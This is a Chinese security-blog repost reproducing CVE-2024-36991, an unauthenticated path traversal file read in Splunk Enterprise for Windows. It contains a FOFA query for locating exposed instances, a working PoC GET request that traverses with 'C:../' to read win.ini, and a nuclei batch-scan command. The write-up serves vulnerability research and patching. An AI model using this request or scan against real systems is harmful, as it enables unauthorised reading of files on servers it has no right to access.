漏洞复现-CVE-2024-36991

admin
admin
admin
138174
文章
113
评论
2024年7月15日13:21:27评论38 views字数 1020阅读3分24秒阅读模式

:漏洞名称

Splunk Enterprise for Windows 任意文件读取漏洞

:漏洞描述

Splunk Enterprise是一款功能强大的数据分析引擎,旨在从所有IT系统和基础设施数据中提供数据搜索、报表和可视化展现。Splunk Enterprise能够收集、索引和利用所有应用程序、服务器和设备(包括物理、虚拟和云中环境)生成的快速移动型计算机数据。它允许用户从一个位置搜索并分析所有实时和历史数据,为IT运营、安全监控和业务分析等领域提供全面的解决方案。
  Splunk Enterprise for Windows 版本中,使用Python内置的 os.path.join 函数拼接路径时,若路径组件中的磁盘驱动器号与已构建路径中的驱动器号相同则会移除该驱动器号,导致 /modules/messaging/ 端点存在路径遍历漏洞,未授权的攻击者可利用该漏洞读取任意文件,使系统处于极不安全的状态。
漏洞影响版本
9.2.0 <= Splunk Enterprise < 9.2.29.1.0 <= Splunk Enterprise < 9.1.59.0.0 <= Splunk Enterprise < 9.0.10

:网络空间测绘查询

FOFA

app="splunk-Enterprise"

漏洞复现-CVE-2024-36991

五:漏洞复现

poc
GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1Host: User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Connection: closeAccept-Encoding: gzip
任意文件读取漏洞(Arbitrary File Read Vulnerability)通常是由于程序对用户输入的文件路径或文件名没有进行足够的验证和过滤,导致攻击者可以通过构造恶意输入来读取任意文件。
六:批量检测
nuclei.exe -t CVE-2024-36991.yaml -l host.txt
七:修复建议
建议更新当前系统或软件至最新版,完成漏洞的修复。

原文始发于微信公众号(Adler学安全):漏洞复现-CVE-2024-36991

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月15日13:21:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现-CVE-2024-36991https://cn-sec.com/archives/2948026.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息